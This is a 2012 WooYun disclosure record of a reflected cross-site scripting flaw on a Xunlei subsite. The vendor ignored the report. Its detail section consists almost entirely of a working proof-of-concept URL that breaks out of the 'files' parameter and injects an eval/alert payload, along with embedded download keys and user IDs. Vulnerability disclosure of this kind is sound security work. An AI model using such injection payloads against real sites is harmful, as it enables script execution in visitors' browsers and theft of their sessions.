漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-012781
漏洞标题:迅雷某分站Xss漏洞
相关厂商:迅雷
漏洞作者: 波波虎
提交时间:2012-09-27 13:47
修复时间:2012-10-02 13:48
公开时间:2012-10-02 13:48
漏洞类型:xss跨站脚本攻击
危害等级:低
自评Rank:7
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-09-27: 细节已通知厂商并且等待厂商处理中
2012-10-02: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
迅雷某分站用户输入过滤不严,导致Xss
详细说明:
http://f.xunlei.com/ex/savefile?files=[{name:%27273%32.rar%27,cid:%2773848F3D47DAC34A23F7B860DD90B9A9BD8BA32B%27,gcid:
%276BAFBD01583E96A1A7F518C2D39707A2DEADF566%27,section:%27%27,url:%27http://dl1.c6.sendfile.vip.xunlei.com:8000/2734%252Erar?key=953c13cdf61ed238b0d1813c86e8e941%26file_url=%252Fgdrive%252Fresource%252F6B
%252F66%252F6BAFBD01583E96A1A7F518C2D39707A2DEADF566%26file_type=1%26authkey=6C77A8F5E5E455E5DBBDF1B8CED4F6DE2DCA88252846FCCE6655B7787A16E29C
%26exp_time=1350678477%26from_uid=205892769%26task_id=5792264964941945090%26get_uid=7
910099%26reduce_cdn=1%26f=lixian.vip111.xunlei.com%26fid=c4SPPUfaw0oj97hg3ZC5qb2Loyv
%2BRBVjAAAAAGuvvQFYPpahp/UYwtOXB6LerfVm
%26mid=666%26threshold=150%26tid=D2BA0E83A2666249B878251BB1F98CCA
%26srcid=7%26verno=1%27,size:1662338302}]%22%29%29;eval%28%28%22alert
%280%29&jumpkey=97A86B0652180D4DF37D536396174CFA8A9AABD2A98125AE69EBD202D93E9FBF141BC
AC92A009E55A5258CABD6AB6510F9B76115DB66FD0762FCA6436B693BA6F8B38F3F9E86D1E7AB8EFD4674
8C0C88
漏洞证明:
修复方案:
还是要修复的吧。这个还是可以用的
版权声明:转载请注明来源 波波虎@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2012-10-02 13:48
厂商回复:
最新状态:
暂无